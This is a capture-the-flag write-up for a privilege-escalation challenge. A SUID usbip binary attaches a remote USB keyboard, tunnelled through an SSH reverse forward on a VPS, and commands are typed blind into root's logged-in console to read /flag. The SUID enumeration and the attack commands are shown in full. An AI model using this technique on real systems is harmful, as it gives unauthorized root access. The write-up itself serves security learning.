Tags: misc net privesc usb 

Rating:

Hi, a small write-up despite the lack of time to validate this chall.
The goal is to find a privilege escalation as root to get the flag in /flag.
I resume the recognition phase which is complicated with the timeout.

Search for suid binaries
```bash
find / -user root -perm -u=s 2>/dev/null
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/umount
/usr/sbin/usbip
```
Usbip allows to share USB devices between computers with their full functionality, seems a good candidate...

Look at the active processes
```bash
ps -edf
UID PID PPID C STIME TTY TIME CMD
root 1 0 14 21:19 ? 00:00:06 /sbin/init
root 2 0 0 21:19 ? 00:00:00 [kthreadd]
...
root 127 1 1 21:19 ttyS0 00:00:00 /bin/login -f
root 142 123 1 21:19 tty1 00:00:00 -bash
user 143 127 1 21:19 ttyS0 00:00:00 -bash
user 148 143 0 21:20 ttyS0 00:00:00 ps -edf
```
We notice that root is connected to tty1 and our is ttyS0.

We have all the necessary information, the idea is to connect a remote USB keyboard (with root suid rights) with usbip. Then, we must type the blind commands and redirect the output to our tty /dev/ttyS0.

Requierments :
* an additional keyboard
* a vps

Open an ssh remote forward tunnel from the default usbip port (3240) between your computer and your vps.
Make sure that the "GatewayPorts yes" option is enabled in the vps sshd_config.
```bash
ssh user@<vps-ip> -R 3240:localhost:3240
```

Install the usbip tools on your conputer
```bash
sudo apt install usbip
```

Start the necessary kernel modules on your computer and start uspipd
```bash
sudo modprobe usbip-host
sudo modprobe usbip-core
sudo usbipd -D
```

Now you have to plug the additional keyboard to your computer.

Find the bus id of the new keyboard
```bash
sudo usbip list -l # ex : 1-7
```

Bind the bus id on your computer (don't touch the new keybord or the link will be down)
```bash
sudo usbip --debug bind -b 1-7
usbip: debug: usbip.c:141:[run_command] running command: `bind'
usbip: info: bind device on busid 1-7: complete
```

On the chall, connect the remote keyboard and display the contents of /dev/ttyS0
```bash
/sbin/usbip attach -r <vps-ip> -b 1-7&
cat /dev/ttyS0
```

Now, you can blindly launch commands with the remote keyboard (beware of the timeout, you have to be fast ;) )
```bash
ls /flag > /dev/ttyS0
cat /flag/flag.txt > /dev/ttyS0
```

Flag : CSR{UNR35TR1CT3D_USB_1S_B4D_F0R_Y0UR_0PS3C}